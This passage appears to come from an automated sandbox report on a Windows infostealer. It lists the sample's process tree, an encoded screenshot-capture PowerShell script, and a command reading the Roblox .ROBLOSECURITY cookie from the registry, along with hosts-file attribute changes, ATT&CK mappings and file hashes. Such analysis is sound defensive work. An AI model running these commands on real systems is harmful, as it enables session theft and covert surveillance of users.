ZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      PID:2344
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xe3qn5q0\xe3qn5q0.cmdline"
        5⤵
        
        PID:1788
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2A4.tmp" "c:\Users\Admin\AppData\Local\Temp\xe3qn5q0\CSCAC6C8FE594F54DC49394DAA34B863D.TMP"
        6⤵
        
        PID:4852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2500
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:1044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4828
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1520
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Views/modifies file attributes
      PID:3316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4604
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Views/modifies file attributes
      PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5088
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4688
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:4120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3016
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:64
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3664
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:884
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:4892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2892
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4916
  - - C:\Windows\SysWOW64\getmac.exe
      getmac
      4⤵
      PID:972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:872
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
bdf103ecadf2098f1a4af55b65cd072a

SHA1
cd0c398d2c35946a65653d8f5be64681dff0ac96

SHA256
3026e82835ee98106040a6da7252950f518e6fb3449bfd2293d7f9abbb19918a

SHA512
ef8ec609de440269cb7597041b3df164a7d83141b038003f26b782de53c0a0de4b985576c862d7a637a6b3d8201267c45c22d726b1d76fd66793a211b81463c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
391110787230d466d7cb549a6264ecf0

SHA1
16a161bf8c11030f34a54984607dab8be4c4acc8

SHA256
282e88fd752be704fa3271b74bf3bbc897b23d209e2564133fe4191f4e9bc030

SHA512
aa2548f99207ca627e47b2554badb76f810da10727bff28805082ee20aa958e5910e66fe7a3e1b4d905060e26b8c2331743be383f40f0f8fe6466428d2757c6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b8520a3ba2b81bd5819affb5d4ef460b

SHA1
75dfb0303884ba733a75d921b78c96e14ff6bbfd

SHA256
50b9fda43abdfcb6ea99e02d43a7c3dc2e50a3a084a02159c2d1e656ba5f70b6

SHA512
30af055056ece312df4562d0009857f71723ec26f6cc0d3cd74727dfbb47757eebd352c5938aca16ddb42ca06b98a5b9a4ee945d45aa211927e339e66d0daf09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
cf0cb61e2cc33c515cfab329d6080ec1

SHA1
7da233a91db95bc128b53357a95b696daf4f23cd

SHA256
3934235ee930f9ebe9dd92167268e2f37dcfd6711ce6bec77288ebdc682b5d78

SHA512
a8ec49f186c81d25e7ee388b43c8e9770b83c393676c7a262f82e04b5ef42c81c1a7def9b6f5d90b8cc0eb1ffe9c48985697ef7a3f4917458da8814e3dd2c064

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
1eac013b9c04fa815ef7ada6750ead85

SHA1
2f7b260dfc19c2dc8debd73f6c411f7499ecfa1b

SHA256
2cc60460a13fb7bf46b1a0332748c4c31a66217b1340b172d99ccf94d1fd2cd1

SHA512
03fa62cdf33a19fef85a7db51a06226c66ad93d40e629f0e804867a36dcbbc2581803082dce195629396adb55189af2ea0efd85d68e64e79eb97d7a5a86cd676

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC2A4.tmp

Filesize
1KB

MD5
15bccc40646f68a73b4fa395609d1ac6

SHA1
18e83c9a8c09ce5cf587065b9956456d778cf6b6

SHA256
580e7f89dee4c7690d73664c422e8380ccec856482f451e387bb483faffafadf

SHA512
e94e816f8bf7840402cc9f69211cc7891ac5d265f35c443e4d4f3b1b480778c512e39cb8c65807111f0742e65c95f75412d080edfd7f5d6b24e99601902627f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\VCRUNTIME140.dll

Filesize
87KB

MD5
656ffcbfe10e81b64a59f7bfc86581ea

SHA1
765fe7b0bd404cb6fabb1b16372f2e41889f087b

SHA256
e72cb60bc3afaed6f38fa28d7111938067a9e4bed38a36f7a1ac6b9c1f16d0e2

SHA512
c5dfc2991cc382d5f9a03219f3e58c3c51b1baa77972d97548fa89b2c5a37d3eb80b1c7e2dae3e3336d02b755a53d78751f49d60250c4cb6ebcaa7a7756e1a18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\_bz2.pyd

Filesize
44KB

MD5
a5d63dcb9cb38f2e09d31c185dd6d533

SHA1
7c840b640dfc64eb0a211b2ed633cc9606722117

SHA256
16b1069936674b1a133abe5286d52d2bd8297364eeb148052c7363f22a5655ba

SHA512
db5d7d95f03e67e2e6bacf812da443aaf139d83987705583a4e8050cadf18b7f9da4c724970d23fe912cd5ee0f78b0368ffd272a8c04723a9a9e612d59e12d35

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\_ctypes.pyd

Filesize
55KB

MD5
03237d39f202c5ca4fdddd24961a1a90

SHA1
1e88f87648bd1a8830a1b9b4deb6de0ad109e8ad

SHA256
2fed29b5ca160ff2616b08ddaa29d4a734624efabdbca3b38b116835ead9c477

SHA512
31270c821dd12ab47352382a5a4f0e5682998edab38f889ed2694ccf0c425cee85fee646ed65f4696038cf4b28b097fd5d0c9134b29b290c0a40e60084292158

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\_decimal.pyd

Filesize
91KB

MD5
51ff75f20bd4fdcb56856071ec5ea83b

SHA1
7e758202fd2c09dc93b0ce012a8745003c6bfa29

SHA256
36e74ceda1389e996ff20e31f4d60a445ddb292243345f767d9985415be09b26

SHA512
21224a2c4d40f095b33ac9ad1f6638aa8c1c95e445390cbdc2629fc257d093a94ecaf8f5c45e6647e01c129d13d70ecdbbd23fb88259f5ab4e6c7489a93580d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\_hashlib.pyd

Filesize
30KB

MD5
eb544e960f4ead487959f407e4bd5b32

SHA1
e68f7764cfd3878459b20f75b69d63f9c5fc3aef

SHA256
1f64348ea9e57adb5bb4d9ba265eed507af904cae8d668e465811f1820b1cba3

SHA512
e4db5870faf8e1f9bc8668f436bd995795b2d98ebb9f4f9142a99e8d3128065aa6e267bed5bd89862102fc30e3053e1ed9b62e5f4f886d9d6816bfffa96826f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\_lzma.pyd

Filesize
78KB

MD5
39dfdfb5e3201fea397b991f42998baa

SHA1
56128be23f53fceddbad37d530383d4a950554b8

SHA256
4273703225de2947059955705f664ebe74ba92e46da51085e127608ac7047d2a

SHA512
b918e34f1ebbbf1f732a168493870b05d34e46e5b9612eaed9d56cd34fe9eab5419145be746968b2f26012559489f1b6313deb5e75fa94c22a0be5fb142ed6c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\_queue.pyd

Filesize
25KB

MD5
a73a401c15f5bddefc2351ef1320c3bf

SHA1
7c4db2f8d2e2e8ef01705dc1017ccd81864d94bd

SHA256
f1351c9290f4e6204809a1bc51b4177b580d664359d287ebb28ecb1e7a827601

SHA512
b5f1095bba64a9597f5fab0b7be1f1c12a436b396743cacf872946b6bf047f870a9605ae74c9b1f887c3002ee5c1fb6941e6f9dd5e500c8dcdadb630223aaf73

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\_socket.pyd

Filesize
40KB

MD5
ea8ddfb0016172dba4f154c086dcb1be

SHA1
0c6f28c952496c37b3047e6e177dd19d3ffd9c23

SHA256
6625589a1d716c01b26514f78def6652674f2e825276634f600d3627467a5b64

SHA512
9b4e2f1037cd1b24e0531660698673ec0b592be8c62ce66270db967faba7967c30c958ac9d5b7541e9b7c1cb54f10ff83a297fa014dbc7e4b28812f0eeffaec1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\_sqlite3.pyd

Filesize
46KB

MD5
96129b49512a7bbaae9708c599bf3595

SHA1
f6586a9e46b9ba5786041162ddf0de33baccc125

SHA256
347d027cae03c4145fb7989dc6ec928267b92c3517fe877dcbcc4fbd5189cf3c

SHA512
933db6a7cd01c8b99e003498765124f0cde7dc78933b638deec58262c7b14771fe331654d379d3a895c1487c9431878f90441cbd239028603a03b42462eb6667

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\_ssl.pyd

Filesize
62KB

MD5
dd7e479215b8798b68b8b7d1f0a29e72

SHA1
5abc1bd16c9ab145d4f077d198ac9d76be1001ba

SHA256
c848466b094dbc8915152ec2af51eae16e260dd5e4328ea7191992984e4d112b

SHA512
9e9c15723ab997ebed123936949a3abaf327c37fada3a0464885af9faa5e6aaf8085cf1df8b21bf3c65730e8054177ce9660b318c32d8ec62d6722dc1cc5e5bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\base_library.zip

Filesize
1.3MB

MD5
a9cbd0455b46c7d14194d1f18ca8719e

SHA1
e1b0c30bccd9583949c247854f617ac8a14cbac7

SHA256
df6c19637d239bfedc8cd13d20e0938c65e8fdf340622ff334db533f2d30fa19

SHA512
b92468e71490a8800e51410df7068dd8099e78c79a95666ecf274a9e9206359f049490b8f60b96081fafd872ec717e67020364bcfa972f26f0d77a959637e528

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\blank.aes

Filesize
114KB

MD5
a1e8292e784f3d8f6946f1ae712de12d

SHA1
3dd3fdb59ad04d91056a1d91c177e76423fbc9fd

SHA256
dbf32b3637676eb87cb4796a0a051d13c93434a5055491e1d6758c9cc12df185

SHA512
3c966cfc645789817405b4e7ca387c9f34da81a5b3a3fb7fe1cc2c03adea74ded0b5a07431dbc4d93ad4ea188760a50f50f83299f2d7870542152f09553f071a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\libcrypto-3.dll

Filesize
1.0MB

MD5
d775f7ce016bf7a4d2e019d2fb91cf89

SHA1
a3f71afec1bfac9f4504049074a743bcfe364a43

SHA256
36ab6303ebf188afe771221c08c5e76c95d032b8c2f76adefb6b7e9c74e761d6

SHA512
013380435845bd560e75c123a1997e8a08cabc688572e8380375576dd8c694b552f8ca43d41f6e9d745ce5c72de4e0a5ec5c88fc8f3e385cf5f905badacc23b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\libffi-8.dll

Filesize
28KB

MD5
50d1bacecfb4df4b7f4080803cb07e4a

SHA1
e4fd81cc1de13291f5a113f386e831396d6db41d

SHA256
d555fc44125cfa750721ecd47ef64b5e1ecebbe5e94e25ea47c78dd797a94c6f

SHA512
12f9a4989ce535f3907b894589c9df18832c057d58d0674340c80d28171fdd6b2c4a1f0f581083ce4167e51013b913f05b694b370dbc3bfc43a3528814168156

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\libssl-3.dll

Filesize
190KB

MD5
e2b1f7d4d43daef0691be6aee6257eb3

SHA1
50c875fd40b57c057244d04334d62b4c9e910f51

SHA256
e063ca6000e51229dde8ee5f7d26158a1daf745dff5081816cfb13000b7f5d9f

SHA512
c510503122479919bc6de4a2de836dc5bf9a4000093d0734feef774607ee44bb3411d98838177b674b1b730c0ee8c5828e29bb83b60cdc65cdfd617ab0a63d6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\python313.dll

Filesize
1.5MB

MD5
aa78e8a166f83bd96b4b140e4e1d9da0

SHA1
ffdb720b8fc6e3032258b9963d70bea8fdab1622

SHA256
c5926ed525522f0e411b25121a6f853ce6716f050bd632afbbf93ab2a8787a76

SHA512
14874c64d6b750b85b97d8fc9108dced469c43e93b41106504af0082f230073bd2ac077c636b8c47c5280e36f8c5dcf9dc2bebf9fea361d55e0240dc43a94c99

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\select.pyd

Filesize
24KB

MD5
507fac498f3725e6a087db5c8b0ebd2f

SHA1
e3080a7d3c7d90fcd3c2d9870e515ae11836b3cc

SHA256
ca1232f1e3fe1ad2cc751e685ef568a2d883637e972bce9d747053e76dff037b

SHA512
ada1561f26939331d5d8d529bd193dcce4bbb8056cd6e9a11da8905aed487db5b00b4bf2472f507600aa249f614f31cc4e5fa622bb8b4e3f98ff35c0effd75bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\sqlite3.dll

Filesize
525KB

MD5
2d5bb20dbe3e8a236ba81d5d61633157

SHA1
00bb2a9bb94c709b718a93e0067d124f026fd11b

SHA256
8db91c1fa75fe2d620c747b3341084d7c0b4611b698d4f9f4cb026bcd1459d2e

SHA512
20357af27a906485456da0d3701ce42ebd5ccd6bc82246ea950506e9a0f00e839c42f41c369b9cfd83b9a80bf51522f15d5400a9a586f660fe8fdbf25cb7f94a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47282\unicodedata.pyd

Filesize
255KB

MD5
63b3f2bcecbffaacf34b7903a3fc161b

SHA1
8480c031b9646802803c90489e0bfb25e2b4c310

SHA256
0feeecbbccd3d087fd8b67193dc8f88223e8185d3e6d219caa357d2ae7d460bb

SHA512
ce00945c52332848a7d9e995f93431de935094068cece1ff0ada77182f18da956bd8757948885adfe5cd0958d1d3bc4e2995ed48df6938ec6391170d6a3054d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hfa4iby2.vzm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xe3qn5q0\xe3qn5q0.dll

Filesize
4KB

MD5
d90d8a0806e29df92e7fc0d82cafd9b3

SHA1
f8606f46c87ffe9a8a0be859b21b7c7d2def650a

SHA256
dcf09863d585fe823889017014c8799a5a743ec921690641eae6a3dfffb767f1

SHA512
4f1b67a25e25ef8b7b3766f8a8a35b594e1ed944d90efddcf3c105163e71fb481a4d2f9ae157e1543ad938c802134e15d97d89da3b2dd4a5c7140ddf60e0d998

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xe3qn5q0\CSCAC6C8FE594F54DC49394DAA34B863D.TMP

Filesize
652B

MD5
2bc2e332dbe3743d3c376bf7ba455c56

SHA1
7fb651217333706683bf3d7692b4ea80115e0ae5

SHA256
904b3360b9d0cc5b7665ad65c075e9f963b24d1d57ca3ac23772962071e0c065

SHA512
f96fa6bae47aeefdcd8a8c514f4c92e785344cf6ce800145f23e0d0fcb6128091e4168b97c5ac7d1127894c086adf032adf2fcc8bc975de86fe703a7f7f7f9ed

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xe3qn5q0\xe3qn5q0.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xe3qn5q0\xe3qn5q0.cmdline

Filesize
607B

MD5
5c79d15befeca3a70bc06b86aa51f776

SHA1
c3ff58c4f74353dd1ff993cd5312fbed597986fc

SHA256
62a8055ad08cf7f65562d8e52975fe2301eeebddd48c29015dbc67edd937ab08

SHA512
67dfd3b64ebb7fc79b9601c8ecddfbf264c8117e1e9c2a1aea2b32f1a6e04e9e7502b81a1ccbcd78425c34f707afbdcf9669bce5af49bf8ca4879c379bb7fa5b

Download Submit
memory/432-257-0x0000000006F50000-0x0000000006FE2000-memory.dmp

Filesize
584KB

Download
memory/432-255-0x0000000006E50000-0x0000000006E72000-memory.dmp

Filesize
136KB

Download
memory/432-256-0x0000000007430000-0x00000000079D4000-memory.dmp

Filesize
5.6MB

Download
memory/1776-54-0x0000000074E70000-0x0000000074E97000-memory.dmp

Filesize
156KB

Download
memory/1776-75-0x0000000074770000-0x000000007477C000-memory.dmp

Filesize
48KB

Download
memory/1776-56-0x0000000074E50000-0x0000000074E68000-memory.dmp

Filesize
96KB

Download
memory/1776-340-0x0000000074F10000-0x00000000754A2000-memory.dmp

Filesize
5.6MB

Download
memory/1776-161-0x0000000074E30000-0x0000000074E4F000-memory.dmp

Filesize
124KB

Download
memory/1776-346-0x0000000074CF0000-0x0000000074E2F000-memory.dmp

Filesize
1.2MB

Download
memory/1776-25-0x0000000074F10000-0x00000000754A2000-memory.dmp

Filesize
5.6MB

Download
memory/1776-48-0x0000000074EA0000-0x0000000074EAD000-memory.dmp

Filesize
52KB

Download
memory/1776-294-0x0000000074800000-0x00000000748A8000-memory.dmp

Filesize
672KB

Download
memory/1776-80-0x00000000746C0000-0x000000007476E000-memory.dmp

Filesize
696KB

Download
memory/1776-194-0x0000000074CF0000-0x0000000074E2F000-memory.dmp

Filesize
1.2MB

Download
memory/1776-252-0x0000000074C50000-0x0000000074C7F000-memory.dmp

Filesize
188KB

Download
memory/1776-47-0x0000000074EB0000-0x0000000074ED2000-memory.dmp

Filesize
136KB

Download
memory/1776-214-0x0000000074CD0000-0x0000000074CE5000-memory.dmp

Filesize
84KB

Download
memory/1776-265-0x00000000748B0000-0x0000000074C44000-memory.dmp

Filesize
3.6MB

Download
memory/1776-64-0x0000000074C80000-0x0000000074C8C000-memory.dmp

Filesize
48KB

Download
memory/1776-58-0x0000000074E30000-0x0000000074E4F000-memory.dmp

Filesize
124KB

Download
memory/1776-71-0x0000000074800000-0x00000000748A8000-memory.dmp

Filesize
672KB

Download
memory/1776-60-0x0000000074CF0000-0x0000000074E2F000-memory.dmp

Filesize
1.2MB

Download
memory/1776-74-0x0000000074780000-0x0000000074791000-memory.dmp

Filesize
68KB

Download
memory/1776-62-0x0000000074CD0000-0x0000000074CE5000-memory.dmp

Filesize
84KB

Download
memory/1776-67-0x0000000074C50000-0x0000000074C7F000-memory.dmp

Filesize
188KB

Download
memory/1776-66-0x0000000074F10000-0x00000000754A2000-memory.dmp

Filesize
5.6MB

Download
memory/1776-70-0x00000000748B0000-0x0000000074C44000-memory.dmp

Filesize
3.6MB

Download
memory/2016-81-0x0000000002BF0000-0x0000000002C26000-memory.dmp

Filesize
216KB

Download
memory/2016-264-0x0000000007A40000-0x0000000007A54000-memory.dmp

Filesize
80KB

Download
memory/2016-267-0x0000000007B40000-0x0000000007B5A000-memory.dmp

Filesize
104KB

Download
memory/2016-230-0x000000006E820000-0x000000006E86C000-memory.dmp

Filesize
304KB

Download
memory/2016-263-0x0000000007A30000-0x0000000007A3E000-memory.dmp

Filesize
56KB

Download
memory/2344-277-0x0000000005650000-0x0000000005658000-memory.dmp

Filesize
32KB

Download
memory/2924-193-0x00000000062F0000-0x000000000630E000-memory.dmp

Filesize
120KB

Download
memory/2924-227-0x00000000072B0000-0x0000000007353000-memory.dmp

Filesize
652KB

Download
memory/2924-251-0x0000000007890000-0x0000000007926000-memory.dmp

Filesize
600KB

Download
memory/2924-82-0x0000000005540000-0x0000000005B68000-memory.dmp

Filesize
6.2MB

Download
memory/2924-250-0x0000000007680000-0x000000000768A000-memory.dmp

Filesize
40KB

Download
memory/2924-269-0x0000000007930000-0x0000000007938000-memory.dmp

Filesize
32KB

Download
memory/2924-228-0x0000000007CA0000-0x000000000831A000-memory.dmp

Filesize
6.5MB

Download
memory/2924-229-0x0000000007620000-0x000000000763A000-memory.dmp

Filesize
104KB

Download
memory/2924-215-0x0000000007260000-0x0000000007292000-memory.dmp

Filesize
200KB

Download
memory/2924-253-0x0000000007810000-0x0000000007821000-memory.dmp

Filesize
68KB

Download
memory/2924-226-0x0000000006890000-0x00000000068AE000-memory.dmp

Filesize
120KB

Download
memory/2924-216-0x000000006E820000-0x000000006E86C000-memory.dmp

Filesize
304KB

Download
memory/2924-195-0x0000000006380000-0x00000000063CC000-memory.dmp

Filesize
304KB

Download
memory/2924-165-0x0000000005CE0000-0x0000000006034000-memory.dmp

Filesize
3.3MB

Download
memory/2924-163-0x00000000054D0000-0x0000000005536000-memory.dmp

Filesize
408KB

Download
memory/2924-164-0x0000000005B70000-0x0000000005BD6000-memory.dmp

Filesize
408KB

Download
memory/2924-162-0x0000000005330000-0x0000000005352000-memory.dmp

Filesize
136KB

Download
memory/3344-364-0x00000000059B0000-0x0000000005D04000-memory.dmp

Filesize
3.3MB

Download
memory/3344-366-0x00000000063F0000-0x000000000643C000-memory.dmp

Filesize
304KB

Download
memory/4396-240-0x000000006E820000-0x000000006E86C000-memory.dmp

Filesize
304KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads